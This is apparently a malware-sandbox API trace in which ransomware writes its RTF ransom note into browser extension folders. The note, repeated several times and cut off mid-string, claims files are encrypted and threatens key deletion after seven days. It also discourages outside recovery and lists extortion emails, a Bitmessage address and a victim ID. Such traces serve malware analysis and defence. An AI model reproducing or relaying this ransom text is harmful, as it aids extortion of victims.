lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.119] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.119] CloseHandle (hObject=0x2e8) returned 1 [0292.119] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0292.119] GetLastError () returned 0x2 [0292.119] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 